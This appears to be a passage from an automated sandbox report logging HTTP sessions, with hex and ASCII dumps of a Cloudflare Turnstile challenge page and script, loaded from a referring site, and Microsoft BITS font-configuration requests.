                          2024-05-22 15:56:48 UTC1369INData Raw: 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 35 22 29 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77
                          Data Ascii: .setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2","5"),n.appendChild(t);var f=document.createElementNS("http://w


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.4497442.19.104.72443
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:48 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-05-22 15:56:49 UTC466INHTTP/1.1 200 OK
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-weu-z1
                          Cache-Control: public, max-age=87131
                          Date: Wed, 22 May 2024 15:56:48 GMT
                          Connection: close
                          X-CID: 2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449747104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:50 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: iframe
                          Referer: https://oknya83345.eleteriod.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:50 UTC1362INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 79404
                          Connection: close
                          origin-agent-cluster: ?1
                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                          referrer-policy: same-origin
                          cross-origin-embedder-policy: require-corp
                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                          cross-origin-opener-policy: same-origin
                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                          cross-origin-resource-policy: cross-origin
                          document-policy: js-profiling
                          2024-05-22 15:56:50 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 38 37 64 66 66 39 66 36 64 38 66 34 32 39 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                          Data Ascii: Server: cloudflareCF-RAY: 887dff9f6d8f429d-EWRalt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:50 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                          2024-05-22 15:56:50 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                          Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                          2024-05-22 15:56:50 UTC1369INData Raw: 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20
                          Data Ascii: miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width:
                          2024-05-22 15:56:50 UTC1369INData Raw: 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b
                          Data Ascii: a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark
                          2024-05-22 15:56:50 UTC1369INData Raw: 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c
                          Data Ascii: border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited,
                          2024-05-22 15:56:50 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76
                          Data Ascii: color: #fafafa;}#challenge-overlay,#challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-ov
                          2024-05-22 15:56:50 UTC1369INData Raw: 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20
                          Data Ascii: t:active ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1);
                          2024-05-22 15:56:50 UTC1369INData Raw: 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67
                          Data Ascii: .size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-alig
                          2024-05-22 15:56:50 UTC1369INData Raw: 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69
                          Data Ascii: t: 0; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .si


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.4497462.19.104.72443
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:50 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-05-22 15:56:50 UTC534INHTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                          Cache-Control: public, max-age=87231
                          Date: Wed, 22 May 2024 15:56:50 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-05-22 15:56:50 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.449748104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:56:51 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887dff9f6d8f429d HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:56:51 UTC331INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:56:51 GMT
                          Content-Type: application/javascript; charset=UTF-8
                          Content-Length: 443771
                          Connection: close
                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                          Server: cloudflare
                          CF-RAY: 887dffa56d7c4346-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:56:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4b 2c 66 4d 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 4a 2c 67 56 2c 68 38 2c 68 64 2c 68 65 2c 68 66 2c 68 72 2c 68 43 2c 68 47 2c 68 48 2c
                          Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fK,fM,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gJ,gV,h8,hd,he,hf,hr,hC,hG,hH,
                          2024-05-22 15:56:51 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 69 42 2c 67 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 69 66 28 69 42 3d 69 41 2c 66 46 5b 63 5b 69 42 28 31 39 33 35 29 5d 5d 29 7b 69 66 28 63 5b 69 42 28 33 32 34 37 29 5d 3d 3d 3d 69 42 28 31 30 32 34 29 29 7b 69 66 28 67 3d 63 5b 69 42 28 31 31 39 39 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 33 37 2e 34 37 5d 5b 33 5d 5e 63 5b 69 42 28 33 31 34 30 29 5d 28 74 68 69 73 2e 68 5b 32 33 37 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 69 42 28 32 31 30 38 29 5d 28 74 68 69 73 2e 68 5b 32 33 37 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2d 34 32 2c 32 35 36 29 26 32 35 35 2c 36 35 29 2c 6c 3d 63 5b 69 42 28 32 39 30 36 29 5d 28 65 2c 74 68 69 73 29 2c 6d 3d 74 68 69 73 2e 68 5b 63 5b 69 42 28 31 31 39 39 29 5d 28 32 33 37 2c 74 68 69 73 2e 67 29
                          Data Ascii: nction(iB,g,l,m,n,o){if(iB=iA,fF[c[iB(1935)]]){if(c[iB(3247)]===iB(1024)){if(g=c[iB(1199)](this.h[this.g^237.47][3]^c[iB(3140)](this.h[237^this.g][1][iB(2108)](this.h[237^this.g][0]++)-42,256)&255,65),l=c[iB(2906)](e,this),m=this.h[c[iB(1199)](237,this.g)
                          2024-05-22 15:56:51 UTC1369INData Raw: 28 39 39 35 29 5d 3d 66 2c 6e 2e 63 63 3d 67 2c 6e 5b 69 43 28 33 33 36 38 29 5d 3d 6d 2c 4a 53 4f 4e 5b 69 43 28 33 33 37 32 29 5d 28 6e 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 5b 69 43 28 31 35 33 36 29 5d 28 27 76 5f 27 2b 66 46 5b 69 43 28 31 37 38 37 29 5d 5b 69 43 28 39 39 37 29 5d 2b 27 3d 27 2b 42 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 73 3d 66 46 5b 69 43 28 31 37 38 37 29 5d 5b 69 43 28 35 36 33 29 5d 3f 27 68 2f 27 2b 66 46 5b 69 43 28 31 37 38 37 29 5d 5b 69 43 28 35 36 33 29 5d 2b 27 2f 27 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 69 66 28 21 78 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 78 3d 6e 65 77 20 66 46 5b 28 69 43 28 33 32 32 34 29 29 5d 28
                          Data Ascii: (995)]=f,n.cc=g,n[iC(3368)]=m,JSON[iC(3372)](n));continue;case'3':x[iC(1536)]('v_'+fF[iC(1787)][iC(997)]+'='+B);continue;case'4':s=fF[iC(1787)][iC(563)]?'h/'+fF[iC(1787)][iC(563)]+'/':'';continue;case'5':if(!x)return;continue;case'6':x=new fF[(iC(3224))](
                          2024-05-22 15:56:51 UTC1369INData Raw: 29 7d 2c 31 30 29 2c 66 46 5b 69 44 28 37 36 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 47 2c 6f 2c 73 29 7b 69 66 28 69 47 3d 69 44 2c 69 47 28 31 37 33 33 29 3d 3d 3d 69 47 28 31 39 34 34 29 29 7b 6f 3d 28 6f 3d 42 2e 68 5b 6a 5b 69 47 28 31 30 39 38 29 5d 28 32 33 37 2c 43 2e 67 29 5d 2c 6f 5b 33 5d 3d 6a 5b 69 47 28 33 33 31 31 29 5d 28 6a 5b 69 47 28 31 39 34 36 29 5d 28 33 32 35 30 32 2c 6f 5b 33 5d 2b 44 2e 6a 29 2b 35 36 39 31 32 2c 32 35 35 29 2c 45 2e 68 5b 47 2e 67 5e 46 2e 6a 5d 29 3b 74 72 79 7b 6f 5b 69 47 28 36 39 31 29 5d 28 52 29 28 53 2e 6a 29 7d 63 61 74 63 68 28 76 29 7b 69 66 28 6f 3d 61 31 2e 68 5b 61 32 2e 67 5e 32 33 38 5d 2c 30 3c 6f 5b 69 47 28 38 35 36 29 5d 29 7b 69 66 28 61 39 2e 68 5b 61 61 2e 67 5e 35 37 2e 35 36 5d 3d 76 2c
                          Data Ascii: )},10),fF[iD(764)](function(iG,o,s){if(iG=iD,iG(1733)===iG(1944)){o=(o=B.h[j[iG(1098)](237,C.g)],o[3]=j[iG(3311)](j[iG(1946)](32502,o[3]+D.j)+56912,255),E.h[G.g^F.j]);try{o[iG(691)](R)(S.j)}catch(v){if(o=a1.h[a2.g^238],0<o[iG(856)]){if(a9.h[aa.g^57.56]=v,
